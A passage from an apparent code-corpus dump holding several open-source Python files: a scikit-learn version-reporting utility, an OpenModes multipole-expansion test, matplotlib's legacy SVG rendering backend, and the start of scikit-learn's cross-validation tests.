plt.yticks(())
plt.text(.99, .01, ('%.2fs' % (t1 - t0)).lstrip('0'),
transform=plt.gca().transAxes, size=15,
horizontalalignment='right')
plot_num += 1
plt.show()
| bsd-3-clause |
xuewei4d/scikit-learn | sklearn/utils/_show_versions.py | 13 | 1961 | """
Utility methods to print system info for debugging
adapted from :func:`pandas.show_versions`
"""
# License: BSD 3 clause
import platform
import sys
import importlib
from ._openmp_helpers import _openmp_parallelism_enabled
def _get_sys_info():
"""System information
Returns
-------
sys_info : dict
system and Python version information
"""
python = sys.version.replace('\n', ' ')
blob = [
("python", python),
('executable', sys.executable),
("machine", platform.platform()),
]
return dict(blob)
def _get_deps_info():
"""Overview of the installed version of main dependencies
Returns
-------
deps_info: dict
version information on relevant Python libraries
"""
deps = [
"pip",
"setuptools",
"sklearn",
"numpy",
"scipy",
"Cython",
"pandas",
"matplotlib",
"joblib",
"threadpoolctl"
]
def get_version(module):
return module.__version__
deps_info = {}
for modname in deps:
try:
if modname in sys.modules:
mod = sys.modules[modname]
else:
mod = importlib.import_module(modname)
ver = get_version(mod)
deps_info[modname] = ver
except ImportError:
deps_info[modname] = None
return deps_info
def show_versions():
"""Print useful debugging information"
.. versionadded:: 0.20
"""
sys_info = _get_sys_info()
deps_info = _get_deps_info()
print('\nSystem:')
for k, stat in sys_info.items():
print("{k:>10}: {stat}".format(k=k, stat=stat))
print('\nPython dependencies:')
for k, stat in deps_info.items():
print("{k:>13}: {stat}".format(k=k, stat=stat))
print("\n{k}: {stat}".format(k="Built with OpenMP",
stat=_openmp_parallelism_enabled()))
| bsd-3-clause |
DavidPowell/OpenModes | test/test_multipoles.py | 1 | 3921 | # -*- coding: utf-8 -*-
"""
Created on Fri Mar 18 16:59:21 2016
@author: dap124
"""
import numpy as np
import os.path as osp
import matplotlib.pyplot as plt
import openmodes
from openmodes.mesh import gmsh
from openmodes.constants import c
from openmodes.sources import PlaneWaveSource
import helpers
tests_filename = __file__
input_dir = helpers.get_input_dir(tests_filename)
meshfile = osp.join(input_dir, 'sphere.msh')
def generate_mesh():
"Generate a fixed mesh file to ensure consistent results of tests"
meshed_name = gmsh.mesh_geometry(osp.join(openmodes.geometry_dir, 'sphere.geo'),
input_dir, parameters={'radius': 1, 'mesh_tol': 0.3})
assert(meshed_name == meshfile)
def pec_sphere_multipoles(plot=False):
"Multipole expansion of a PEC sphere"
sim = openmodes.Simulation(name='pec_sphere_multipoles')
mesh = sim.load_mesh(meshfile)
sim.place_part(mesh)
k0r = np.linspace(0.1, 3, 50)
freqs = k0r*c/(2*np.pi)
pw = PlaneWaveSource([1, 0, 0], [0, 0, 1], p_inc=1.0)
multipole_order = 4
extinction = np.empty(len(freqs), dtype=np.complex128)
a_e = {}
a_m = {}
for l in range(multipole_order+1):
for m in range(-l, l+1):
a_e[l, m] = np.empty(len(freqs), dtype=np.complex128)
a_m[l, m] = np.empty(len(freqs), dtype=np.complex128)
for freq_count, s in sim.iter_freqs(freqs):
Z = sim.impedance(s)
V = sim.source_vector(pw, s)
V_E = sim.source_vector(pw, s, extinction_field=True)
I = Z.solve(V)
extinction[freq_count] = np.vdot(V_E, I)
a_en, a_mn = sim.multipole_decomposition(I, multipole_order, s)
for l in range(multipole_order+1):
for m in range(-l, l+1):
a_e[l, m][freq_count] = a_en[l, m]
a_m[l, m][freq_count] = a_mn[l, m]
if plot:
plt.figure()
plt.plot(k0r, extinction.real)
plt.plot(k0r, np.pi/k0r**2*sum(sum((np.abs(a_e[l, m])**2+np.abs(a_m[l, m])**2) for m in range(-l, l+1))
for l in range(1, multipole_order+1)), 'x')
plt.plot(k0r, np.pi/k0r**2*sum(sum(np.sqrt(2*l+1)*(-m*a_e[l, m].real-a_m[l, m].real) for m in range(-l, l+1))
for l in range(1, multipole_order+1)), '+')
plt.xlabel('$k_{0}r$')
plt.title("Total extinction vs multipole extinction and scattering")
plt.show()
plt.figure()
for l in range(1, multipole_order+1):
for m in range(-l, l+1):
plt.plot(k0r, np.pi/k0r**2*np.abs(a_e[l, m])**2)
plt.plot(k0r, np.pi/k0r**2*np.abs(a_m[l, m])**2, '--')
plt.title("Multipole contributions to scattering")
plt.xlabel('$k_{0}r$')
plt.show()
plt.figure()
for l in range(1, multipole_order+1):
for m in (-1, 1):
plt.plot(k0r, -np.pi/k0r**2*np.sqrt(2*l+1)*m*a_e[l, m].real)
plt.plot(k0r, -np.pi/k0r**2*np.sqrt(2*l+1)*a_m[l, m].real, '--')
plt.title("Multipole contributions to extinction")
plt.xlabel('$k_{0}r$')
plt.show()
else:
return {'name': 'pec_sphere_multipoles',
'results': {'k0r': k0r, 'extinction': extinction,
'a_e': a_e, 'a_m': a_m},
'rtol': {'a_e': 1e-6, 'a_m': 1e-6}}
# The following boilerplate code is needed to generate an actual test from
# the function
def test_pec_sphere_multipoles():
helpers.run_test(pec_sphere_multipoles, tests_filename)
test_pec_sphere_multipoles.__doc__ = pec_sphere_multipoles.__doc__
if __name__ == "__main__":
# Uncomment the following lines to update reference solutions
# generate_mesh()
# helpers.create_reference(pec_sphere_multipoles, tests_filename)
# Run the tested functions to produce plots, without any checks
pec_sphere_multipoles(plot=True)
| gpl-3.0 |
loretoparisi/nupic | external/linux32/lib/python2.6/site-packages/matplotlib/backends/backend_svg.py | 69 | 23593 | from __future__ import division
import os, codecs, base64, tempfile, urllib, gzip, cStringIO
try:
from hashlib import md5
except ImportError:
from md5 import md5 #Deprecated in 2.5
from matplotlib import verbose, __version__, rcParams
from matplotlib.backend_bases import RendererBase, GraphicsContextBase,\
FigureManagerBase, FigureCanvasBase
from matplotlib.backends.backend_mixed import MixedModeRenderer
from matplotlib.cbook import is_string_like, is_writable_file_like, maxdict
from matplotlib.colors import rgb2hex
from matplotlib.figure import Figure
from matplotlib.font_manager import findfont, FontProperties
from matplotlib.ft2font import FT2Font, KERNING_DEFAULT, LOAD_NO_HINTING
from matplotlib.mathtext import MathTextParser
from matplotlib.path import Path
from matplotlib.transforms import Affine2D
from matplotlib import _png
from xml.sax.saxutils import escape as escape_xml_text
backend_version = __version__
def new_figure_manager(num, *args, **kwargs):
FigureClass = kwargs.pop('FigureClass', Figure)
thisFig = FigureClass(*args, **kwargs)
canvas = FigureCanvasSVG(thisFig)
manager = FigureManagerSVG(canvas, num)
return manager
_capstyle_d = {'projecting' : 'square', 'butt' : 'butt', 'round': 'round',}
class RendererSVG(RendererBase):
FONT_SCALE = 100.0
fontd = maxdict(50)
def __init__(self, width, height, svgwriter, basename=None):
self.width=width
self.height=height
self._svgwriter = svgwriter
if rcParams['path.simplify']:
self.simplify = (width, height)
else:
self.simplify = None
self._groupd = {}
if not rcParams['svg.image_inline']:
assert basename is not None
self.basename = basename
self._imaged = {}
self._clipd = {}
self._char_defs = {}
self._markers = {}
self._path_collection_id = 0
self._imaged = {}
self.mathtext_parser = MathTextParser('SVG')
svgwriter.write(svgProlog%(width,height,width,height))
def _draw_svg_element(self, element, details, gc, rgbFace):
clipid = self._get_gc_clip_svg(gc)
if clipid is None:
clippath = ''
else:
clippath = 'clip-path="url(#%s)"' % clipid
if gc.get_url() is not None:
self._svgwriter.write('<a xlink:href="%s">' % gc.get_url())
style = self._get_style(gc, rgbFace)
self._svgwriter.write ('<%s style="%s" %s %s/>\n' % (
element, style, clippath, details))
if gc.get_url() is not None:
self._svgwriter.write('</a>')
def _get_font(self, prop):
key = hash(prop)
font = self.fontd.get(key)
if font is None:
fname = findfont(prop)
font = self.fontd.get(fname)
if font is None:
font = FT2Font(str(fname))
self.fontd[fname] = font
self.fontd[key] = font
font.clear()
size = prop.get_size_in_points()
font.set_size(size, 72.0)
return font
def _get_style(self, gc, rgbFace):
"""
return the style string.
style is generated from the GraphicsContext, rgbFace and clippath
"""
if rgbFace is None:
fill = 'none'
else:
fill = rgb2hex(rgbFace[:3])
offset, seq = gc.get_dashes()
if seq is None:
dashes = ''
else:
dashes = 'stroke-dasharray: %s; stroke-dashoffset: %f;' % (
','.join(['%f'%val for val in seq]), offset)
linewidth = gc.get_linewidth()
if linewidth:
return 'fill: %s; stroke: %s; stroke-width: %f; ' \
'stroke-linejoin: %s; stroke-linecap: %s; %s opacity: %f' % (
fill,
rgb2hex(gc.get_rgb()[:3]),
linewidth,
gc.get_joinstyle(),
_capstyle_d[gc.get_capstyle()],
dashes,
gc.get_alpha(),
)
else:
return 'fill: %s; opacity: %f' % (\
fill,
gc.get_alpha(),
)
def _get_gc_clip_svg(self, gc):
cliprect = gc.get_clip_rectangle()
clippath, clippath_trans = gc.get_clip_path()
if clippath is not None:
path_data = self._convert_path(clippath, clippath_trans)
path = '<path d="%s"/>' % path_data
elif cliprect is not None:
x, y, w, h = cliprect.bounds
y = self.height-(y+h)
path = '<rect x="%(x)f" y="%(y)f" width="%(w)f" height="%(h)f"/>' % locals()
else:
return None
id = self._clipd.get(path)
if id is None:
id = 'p%s' % md5(path).hexdigest()
self._svgwriter.write('<defs>\n <clipPath id="%s">\n' % id)
self._svgwriter.write(path)
self._svgwriter.write('\n </clipPath>\n</defs>')
self._clipd[path] = id
return id
def open_group(self, s):
self._groupd[s] = self._groupd.get(s,0) + 1
self._svgwriter.write('<g id="%s%d">\n' % (s, self._groupd[s]))
def close_group(self, s):
self._svgwriter.write('</g>\n')
def option_image_nocomposite(self):
"""
if svg.image_noscale is True, compositing multiple images into one is prohibited
"""
return rcParams['svg.image_noscale']
_path_commands = {
Path.MOVETO: 'M%f %f',
Path.LINETO: 'L%f %f',
Path.CURVE3: 'Q%f %f %f %f',
Path.CURVE4: 'C%f %f %f %f %f %f'
}
def _make_flip_transform(self, transform):
return (transform +
Affine2D()
.scale(1.0, -1.0)
.translate(0.0, self.height))
def _convert_path(self, path, transform, simplify=None):
tpath = transform.transform_path(path)
path_data = []
appender = path_data.append
path_commands = self._path_commands
currpos = 0
for points, code in tpath.iter_segments(simplify):
if code == Path.CLOSEPOLY:
segment = 'z'
else:
segment = path_commands[code] % tuple(points)
if currpos + len(segment) > 75:
appender("\n")
currpos = 0
appender(segment)
currpos += len(segment)
return ''.join(path_data)
def draw_path(self, gc, path, transform, rgbFace=None):
trans_and_flip = self._make_flip_transform(transform)
path_data = self._convert_path(path, trans_and_flip, self.simplify)
self._draw_svg_element('path', 'd="%s"' % path_data, gc, rgbFace)
def draw_markers(self, gc, marker_path, marker_trans, path, trans, rgbFace=None):
write = self._svgwriter.write
key = self._convert_path(marker_path, marker_trans + Affine2D().scale(1.0, -1.0))
name = self._markers.get(key)
if name is None:
name = 'm%s' % md5(key).hexdigest()
write('<defs><path id="%s" d="%s"/></defs>\n' % (name, key))
self._markers[key] = name
clipid = self._get_gc_clip_svg(gc)
if clipid is None:
clippath = ''
else:
clippath = 'clip-path="url(#%s)"' % clipid
write('<g %s>' % clippath)
trans_and_flip = self._make_flip_transform(trans)
tpath = trans_and_flip.transform_path(path)
for vertices, code in tpath.iter_segments():
if len(vertices):
x, y = vertices[-2:]
details = 'xlink:href="#%s" x="%f" y="%f"' % (name, x, y)
style = self._get_style(gc, rgbFace)
self._svgwriter.write ('<use style="%s" %s/>\n' % (style, details))
write('</g>')
def draw_path_collection(self, master_transform, cliprect, clippath,
clippath_trans, paths, all_transforms, offsets,
offsetTrans, facecolors, edgecolors, linewidths,
linestyles, antialiaseds, urls):
write = self._svgwriter.write
path_codes = []
write('<defs>\n')
for i, (path, transform) in enumerate(self._iter_collection_raw_paths(
master_transform, paths, all_transforms)):
transform = Affine2D(transform.get_matrix()).scale(1.0, -1.0)
d = self._convert_path(path, transform)
name = 'coll%x_%x_%s' % (self._path_collection_id, i,
md5(d).hexdigest())
write('<path id="%s" d="%s"/>\n' % (name, d))
path_codes.append(name)
write('</defs>\n')
for xo, yo, path_id, gc, rgbFace in self._iter_collection(
path_codes, cliprect, clippath, clippath_trans,
offsets, offsetTrans, facecolors, edgecolors,
linewidths, linestyles, antialiaseds, urls):
clipid = self._get_gc_clip_svg(gc)
url = gc.get_url()
if url is not None:
self._svgwriter.write('<a xlink:href="%s">' % url)
if clipid is not None:
write('<g clip-path="url(#%s)">' % clipid)
details = 'xlink:href="#%s" x="%f" y="%f"' % (path_id, xo, self.height - yo)
style = self._get_style(gc, rgbFace)
self._svgwriter.write ('<use style="%s" %s/>\n' % (style, details))
if clipid is not None:
write('</g>')
if url is not None:
self._svgwriter.write('</a>')
self._path_collection_id += 1
def draw_image(self, x, y, im, bbox, clippath=None, clippath_trans=None):
# MGDTODO: Support clippath here
trans = [1,0,0,1,0,0]
transstr = ''
if rcParams['svg.image_noscale']:
trans = list(im.get_matrix())
trans[5] = -trans[5]
transstr = 'transform="matrix(%f %f %f %f %f %f)" '%tuple(trans)
assert trans[1] == 0
assert trans[2] == 0
numrows,numcols = im.get_size()
im.reset_matrix()
im.set_interpolation(0)
im.resize(numcols, numrows)
h,w = im.get_size_out()
url = getattr(im, '_url', None)
if url is not None:
self._svgwriter.write('<a xlink:href="%s">' % url)
self._svgwriter.write (
'<image x="%f" y="%f" width="%f" height="%f" '
'%s xlink:href="'%(x/trans[0], (self.height-y)/trans[3]-h, w, h, transstr)
)
if rcParams['svg.image_inline']:
self._svgwriter.write("data:image/png;base64,\n")
stringio = cStringIO.StringIO()
im.flipud_out()
rows, cols, buffer = im.as_rgba_str()
_png.write_png(buffer, cols, rows, stringio)
im.flipud_out()
self._svgwriter.write(base64.encodestring(stringio.getvalue()))
else:
self._imaged[self.basename] = self._imaged.get(self.basename,0) + 1
filename = '%s.image%d.png'%(self.basename, self._imaged[self.basename])
verbose.report( 'Writing image file for inclusion: %s' % filename)
im.flipud_out()
rows, cols, buffer = im.as_rgba_str()
_png.write_png(buffer, cols, rows, filename)
im.flipud_out()
self._svgwriter.write(filename)
self._svgwriter.write('"/>\n')
if url is not None:
self._svgwriter.write('</a>')
def draw_text(self, gc, x, y, s, prop, angle, ismath):
if ismath:
self._draw_mathtext(gc, x, y, s, prop, angle)
return
font = self._get_font(prop)
font.set_text(s, 0.0, flags=LOAD_NO_HINTING)
y -= font.get_descent() / 64.0
fontsize = prop.get_size_in_points()
color = rgb2hex(gc.get_rgb()[:3])
write = self._svgwriter.write
if rcParams['svg.embed_char_paths']:
new_chars = []
for c in s:
path = self._add_char_def(prop, c)
if path is not None:
new_chars.append(path)
if len(new_chars):
write('<defs>\n')
for path in new_chars:
write(path)
write('</defs>\n')
svg = []
clipid = self._get_gc_clip_svg(gc)
if clipid is not None:
svg.append('<g clip-path="url(#%s)">\n' % clipid)
svg.append('<g style="fill: %s; opacity: %f" transform="' % (color, gc.get_alpha()))
if angle != 0:
svg.append('translate(%f,%f)rotate(%1.1f)' % (x,y,-angle))
elif x != 0 or y != 0:
svg.append('translate(%f,%f)' % (x, y))
svg.append('scale(%f)">\n' % (fontsize / self.FONT_SCALE))
cmap = font.get_charmap()
lastgind = None
currx = 0
for c in s:
charnum = self._get_char_def_id(prop, c)
ccode = ord(c)
gind = cmap.get(ccode)
if gind is None:
ccode = ord('?')
gind = 0
glyph = font.load_char(ccode, flags=LOAD_NO_HINTING)
if lastgind is not None:
kern = font.get_kerning(lastgind, gind, KERNING_DEFAULT)
else:
kern = 0
currx += (kern / 64.0) / (self.FONT_SCALE / fontsize)
svg.append('<use xlink:href="#%s"' % charnum)
if currx != 0:
svg.append(' x="%f"' %
(currx * (self.FONT_SCALE / fontsize)))
svg.append('/>\n')
currx += (glyph.linearHoriAdvance / 65536.0) / (self.FONT_SCALE / fontsize)
lastgind = gind
svg.append('</g>\n')
if clipid is not None:
svg.append('</g>\n')
svg = ''.join(svg)
else:
thetext = escape_xml_text(s)
fontfamily = font.family_name
fontstyle = prop.get_style()
style = ('font-size: %f; font-family: %s; font-style: %s; fill: %s; opacity: %f' %
(fontsize, fontfamily,fontstyle, color, gc.get_alpha()))
if angle!=0:
transform = 'transform="translate(%f,%f) rotate(%1.1f) translate(%f,%f)"' % (x,y,-angle,-x,-y)
# Inkscape doesn't support rotate(angle x y)
else:
transform = ''
svg = """\
<text style="%(style)s" x="%(x)f" y="%(y)f" %(transform)s>%(thetext)s</text>
""" % locals()
write(svg)
def _add_char_def(self, prop, char):
if isinstance(prop, FontProperties):
newprop = prop.copy()
font = self._get_font(newprop)
else:
font = prop
font.set_size(self.FONT_SCALE, 72)
ps_name = font.get_sfnt()[(1,0,0,6)]
char_id = urllib.quote('%s-%d' % (ps_name, ord(char)))
char_num = self._char_defs.get(char_id, None)
if char_num is not None:
return None
path_data = []
glyph = font.load_char(ord(char), flags=LOAD_NO_HINTING)
currx, curry = 0.0, 0.0
for step in glyph.path:
if step[0] == 0: # MOVE_TO
path_data.append("M%f %f" %
(step[1], -step[2]))
elif step[0] == 1: # LINE_TO
path_data.append("l%f %f" %
(step[1] - currx, -step[2] - curry))
elif step[0] == 2: # CURVE3
path_data.append("q%f %f %f %f" %
(step[1] - currx, -step[2] - curry,
step[3] - currx, -step[4] - curry))
elif step[0] == 3: # CURVE4
path_data.append("c%f %f %f %f %f %f" %
(step[1] - currx, -step[2] - curry,
step[3] - currx, -step[4] - curry,
step[5] - currx, -step[6] - curry))
elif step[0] == 4: # ENDPOLY
path_data.append("z")
currx, curry = 0.0, 0.0
if step[0] != 4:
currx, curry = step[-2], -step[-1]
path_data = ''.join(path_data)
char_num = 'c_%s' % md5(path_data).hexdigest()
path_element = '<path id="%s" d="%s"/>\n' % (char_num, ''.join(path_data))
self._char_defs[char_id] = char_num
return path_element
def _get_char_def_id(self, prop, char):
if isinstance(prop, FontProperties):
newprop = prop.copy()
font = self._get_font(newprop)
else:
font = prop
font.set_size(self.FONT_SCALE, 72)
ps_name = font.get_sfnt()[(1,0,0,6)]
char_id = urllib.quote('%s-%d' % (ps_name, ord(char)))
return self._char_defs[char_id]
def _draw_mathtext(self, gc, x, y, s, prop, angle):
"""
Draw math text using matplotlib.mathtext
"""
width, height, descent, svg_elements, used_characters = \
self.mathtext_parser.parse(s, 72, prop)
svg_glyphs = svg_elements.svg_glyphs
svg_rects = svg_elements.svg_rects
color = rgb2hex(gc.get_rgb()[:3])
write = self._svgwriter.write
style = "fill: %s" % color
if rcParams['svg.embed_char_paths']:
new_chars = []
for font, fontsize, thetext, new_x, new_y_mtc, metrics in svg_glyphs:
path = self._add_char_def(font, thetext)
if path is not None:
new_chars.append(path)
if len(new_chars):
write('<defs>\n')
for path in new_chars:
write(path)
write('</defs>\n')
svg = ['<g style="%s" transform="' % style]
if angle != 0:
svg.append('translate(%f,%f)rotate(%1.1f)'
% (x,y,-angle) )
else:
svg.append('translate(%f,%f)' % (x, y))
svg.append('">\n')
for font, fontsize, thetext, new_x, new_y_mtc, metrics in svg_glyphs:
charid = self._get_char_def_id(font, thetext)
svg.append('<use xlink:href="#%s" transform="translate(%f,%f)scale(%f)"/>\n' %
(charid, new_x, -new_y_mtc, fontsize / self.FONT_SCALE))
svg.append('</g>\n')
else: # not rcParams['svg.embed_char_paths']
svg = ['<text style="%s" x="%f" y="%f"' % (style, x, y)]
if angle != 0:
svg.append(' transform="translate(%f,%f) rotate(%1.1f) translate(%f,%f)"'
% (x,y,-angle,-x,-y) ) # Inkscape doesn't support rotate(angle x y)
svg.append('>\n')
curr_x,curr_y = 0.0,0.0
for font, fontsize, thetext, new_x, new_y_mtc, metrics in svg_glyphs:
new_y = - new_y_mtc
style = "font-size: %f; font-family: %s" % (fontsize, font.family_name)
svg.append('<tspan style="%s"' % style)
xadvance = metrics.advance
svg.append(' textLength="%f"' % xadvance)
dx = new_x - curr_x
if dx != 0.0:
svg.append(' dx="%f"' % dx)
dy = new_y - curr_y
if dy != 0.0:
svg.append(' dy="%f"' % dy)
thetext = escape_xml_text(thetext)
svg.append('>%s</tspan>\n' % thetext)
curr_x = new_x + xadvance
curr_y = new_y
svg.append('</text>\n')
if len(svg_rects):
style = "fill: %s; stroke: none" % color
svg.append('<g style="%s" transform="' % style)
if angle != 0:
svg.append('translate(%f,%f) rotate(%1.1f)'
% (x,y,-angle) )
else:
svg.append('translate(%f,%f)' % (x, y))
svg.append('">\n')
for x, y, width, height in svg_rects:
svg.append('<rect x="%f" y="%f" width="%f" height="%f" fill="black" stroke="none" />' % (x, -y + height, width, height))
svg.append("</g>")
self.open_group("mathtext")
write (''.join(svg))
self.close_group("mathtext")
def finalize(self):
write = self._svgwriter.write
write('</svg>\n')
def flipy(self):
return True
def get_canvas_width_height(self):
return self.width, self.height
def get_text_width_height_descent(self, s, prop, ismath):
if ismath:
width, height, descent, trash, used_characters = \
self.mathtext_parser.parse(s, 72, prop)
return width, height, descent
font = self._get_font(prop)
font.set_text(s, 0.0, flags=LOAD_NO_HINTING)
w, h = font.get_width_height()
w /= 64.0 # convert from subpixels
h /= 64.0
d = font.get_descent()
d /= 64.0
return w, h, d
class FigureCanvasSVG(FigureCanvasBase):
filetypes = {'svg': 'Scalable Vector Graphics',
'svgz': 'Scalable Vector Graphics'}
def print_svg(self, filename, *args, **kwargs):
if is_string_like(filename):
fh_to_close = svgwriter = codecs.open(filename, 'w', 'utf-8')
elif is_writable_file_like(filename):
svgwriter = codecs.EncodedFile(filename, 'utf-8')
fh_to_close = None
else:
raise ValueError("filename must be a path or a file-like object")
return self._print_svg(filename, svgwriter, fh_to_close)
def print_svgz(self, filename, *args, **kwargs):
if is_string_like(filename):
gzipwriter = gzip.GzipFile(filename, 'w')
fh_to_close = svgwriter = codecs.EncodedFile(gzipwriter, 'utf-8')
elif is_writable_file_like(filename):
fh_to_close = gzipwriter = gzip.GzipFile(fileobj=filename, mode='w')
svgwriter = codecs.EncodedFile(gzipwriter, 'utf-8')
else:
raise ValueError("filename must be a path or a file-like object")
return self._print_svg(filename, svgwriter, fh_to_close)
def _print_svg(self, filename, svgwriter, fh_to_close=None):
self.figure.set_dpi(72.0)
width, height = self.figure.get_size_inches()
w, h = width*72, height*72
if rcParams['svg.image_noscale']:
renderer = RendererSVG(w, h, svgwriter, filename)
else:
renderer = MixedModeRenderer(
width, height, 72.0, RendererSVG(w, h, svgwriter, filename))
self.figure.draw(renderer)
renderer.finalize()
if fh_to_close is not None:
svgwriter.close()
def get_default_filetype(self):
return 'svg'
class FigureManagerSVG(FigureManagerBase):
pass
FigureManager = FigureManagerSVG
svgProlog = """\
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<!-- Created with matplotlib (http://matplotlib.sourceforge.net/) -->
<svg width="%ipt" height="%ipt" viewBox="0 0 %i %i"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
version="1.1"
id="svg1">
"""
| agpl-3.0 |
mbayon/TFG-MachineLearning | vbig/lib/python2.7/site-packages/sklearn/model_selection/tests/test_validation.py | 6 | 57672 | """Test the validation module"""
from __future__ import division
import sys
import warnings
import tempfile
import os
from time import sleep
import numpy as np
from scipy.sparse import coo_matrix, csr_matrix
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_false
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import assert_warns
from sklearn.utils.testing import assert_warns_message
from sklearn.utils.testing import assert_no_warnings
from sklearn.utils.testing import assert_raises_regex
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.mocking import CheckingClassifier, MockDataFrame
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import cross_val_predict
from sklearn.model_selection import cross_validate
from sklearn.model_selection import permutation_test_score
from sklearn.model_selection import KFold
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import LeaveOneOut
from sklearn.model_selection import LeaveOneGroupOut
from sklearn.model_selection import LeavePGroupsOut
from sklearn.model_selection import GroupKFold
from sklearn.model_selection import GroupShuffleSplit
from sklearn.model_selection import learning_curve
from sklearn.model_selection import validation_curve
from sklearn.model_selection._validation import _check_is_permutation
from sklearn.datasets import make_regression
from sklearn.datasets import load_boston
from sklearn.datasets import load_iris
from sklearn.datasets import load_digits
from sklearn.metrics import explained_variance_score
from sklearn.metrics import make_scorer
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
from sklearn.metrics import precision_recall_fscore_support
from sklearn.metrics import precision_score
from sklearn.metrics import r2_score
from sklearn.metrics.scorer import check_scoring
from sklearn.linear_model import Ridge, LogisticRegression, SGDClassifier
from sklearn.linear_model import PassiveAggressiveClassifier, RidgeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.cluster import KMeans
from sklearn.preprocessing import Imputer
from sklearn.preprocessing import LabelEncoder
from sklearn.pipeline import Pipeline
from sklearn.externals.six.moves import cStringIO as StringIO
from sklearn.base import BaseEstimator
from sklearn.base import clone
from sklearn.multiclass import OneVsRestClassifier
from sklearn.utils import shuffle
from sklearn.datasets import make_classification
from sklearn.datasets import make_multilabel_classification
from sklearn.model_selection.tests.common import OneTimeSplitter
from sklearn.model_selection import GridSearchCV
try:
WindowsError
except NameError:
WindowsError = None
class MockImprovingEstimator(BaseEstimator):
"""Dummy classifier to test the learning curve"""
def __init__(self, n_max_train_sizes):
self.n_max_train_sizes = n_max_train_sizes
self.train_sizes = 0
self.X_subset = None
def fit(self, X_subset, y_subset=None):
self.X_subset = X_subset
self.train_sizes = X_subset.shape[0]
return self
def predict(self, X):
raise NotImplementedError
def score(self, X=None, Y=None):
# training score becomes worse (2 -> 1), test error better (0 -> 1)
if self._is_training_data(X):
return 2. - float(self.train_sizes) / self.n_max_train_sizes
else:
return float(self.train_sizes) / self.n_max_train_sizes
def _is_training_data(self, X):
return X is self.X_subset
class MockIncrementalImprovingEstimator(MockImprovingEstimator):
"""Dummy classifier that provides partial_fit"""
def __init__(self, n_max_train_sizes):
super(MockIncrementalImprovingEstimator,
self).__init__(n_max_train_sizes)
self.x = None
def _is_training_data(self, X):
return self.x in X
def partial_fit(self, X, y=None, **params):
self.train_sizes += X.shape[0]
self.x = X[0]
class MockEstimatorWithParameter(BaseEstimator):
"""Dummy classifier to test the validation curve"""
def __init__(self, param=0.5):
self.X_subset = None
self.param = param
def fit(self, X_subset, y_subset):
self.X_subset = X_subset
self.train_sizes = X_subset.shape[0]
return self
def predict(self, X):
raise NotImplementedError
def score(self, X=None, y=None):
return self.param if self._is_training_data(X) else 1 - self.param
def _is_training_data(self, X):
return X is self.X_subset
class MockEstimatorWithSingleFitCallAllowed(MockEstimatorWithParameter):
"""Dummy classifier that disallows repeated calls of fit method"""
def fit(self, X_subset, y_subset):
assert_false(
hasattr(self, 'fit_called_'),
'fit is called the second time'
)
self.fit_called_ = True
return super(type(self), self).fit(X_subset, y_subset)
def predict(self, X):
raise NotImplementedError
class MockClassifier(object):
"""Dummy classifier to test the cross-validation"""
def __init__(self, a=0, allow_nd=False):
self.a = a
self.allow_nd = allow_nd
def fit(self, X, Y=None, sample_weight=None, class_prior=None,
sparse_sample_weight=None, sparse_param=None, dummy_int=None,
dummy_str=None, dummy_obj=None, callback=None):
"""The dummy arguments are to test that this fit function can
accept non-array arguments through cross-validation, such as:
- int
- str (this is actually array-like)
- object
- function
"""
self.dummy_int = dummy_int
self.dummy_str = dummy_str
self.dummy_obj = dummy_obj
if callback is not None:
callback(self)
if self.allow_nd:
X = X.reshape(len(X), -1)
if X.ndim >= 3 and not self.allow_nd:
raise ValueError('X cannot be d')
if sample_weight is not None:
assert_true(sample_weight.shape[0] == X.shape[0],
'MockClassifier extra fit_param sample_weight.shape[0]'
' is {0}, should be {1}'.format(sample_weight.shape[0],
X.shape[0]))
if class_prior is not None:
assert_true(class_prior.shape[0] == len(np.unique(y)),
'MockClassifier extra fit_param class_prior.shape[0]'
' is {0}, should be {1}'.format(class_prior.shape[0],
len(np.unique(y))))
if sparse_sample_weight is not None:
fmt = ('MockClassifier extra fit_param sparse_sample_weight'
'.shape[0] is {0}, should be {1}')
assert_true(sparse_sample_weight.shape[0] == X.shape[0],
fmt.format(sparse_sample_weight.shape[0], X.shape[0]))
if sparse_param is not None:
fmt = ('MockClassifier extra fit_param sparse_param.shape '
'is ({0}, {1}), should be ({2}, {3})')
assert_true(sparse_param.shape == P_sparse.shape,
fmt.format(sparse_param.shape[0],
sparse_param.shape[1],
P_sparse.shape[0], P_sparse.shape[1]))
return self
def predict(self, T):
if self.allow_nd:
T = T.reshape(len(T), -1)
return T[:, 0]
def score(self, X=None, Y=None):
return 1. / (1 + np.abs(self.a))
def get_params(self, deep=False):
return {'a': self.a, 'allow_nd': self.allow_nd}
# XXX: use 2D array, since 1D X is being detected as a single sample in
# check_consistent_length
X = np.ones((10, 2))
X_sparse = coo_matrix(X)
y = np.array([0, 0, 1, 1, 2, 2, 3, 3, 4, 4])
# The number of samples per class needs to be > n_splits,
# for StratifiedKFold(n_splits=3)
y2 = np.array([1, 1, 1, 2, 2, 2, 3, 3, 3, 3])
P_sparse = coo_matrix(np.eye(5))
def test_cross_val_score():
clf = MockClassifier()
for a in range(-10, 10):
clf.a = a
# Smoke test
scores = cross_val_score(clf, X, y2)
assert_array_equal(scores, clf.score(X, y2))
# test with multioutput y
multioutput_y = np.column_stack([y2, y2[::-1]])
scores = cross_val_score(clf, X_sparse, multioutput_y)
assert_array_equal(scores, clf.score(X_sparse, multioutput_y))
scores = cross_val_score(clf, X_sparse, y2)
assert_array_equal(scores, clf.score(X_sparse, y2))
# test with multioutput y
scores = cross_val_score(clf, X_sparse, multioutput_y)
assert_array_equal(scores, clf.score(X_sparse, multioutput_y))
# test with X and y as list
list_check = lambda x: isinstance(x, list)
clf = CheckingClassifier(check_X=list_check)
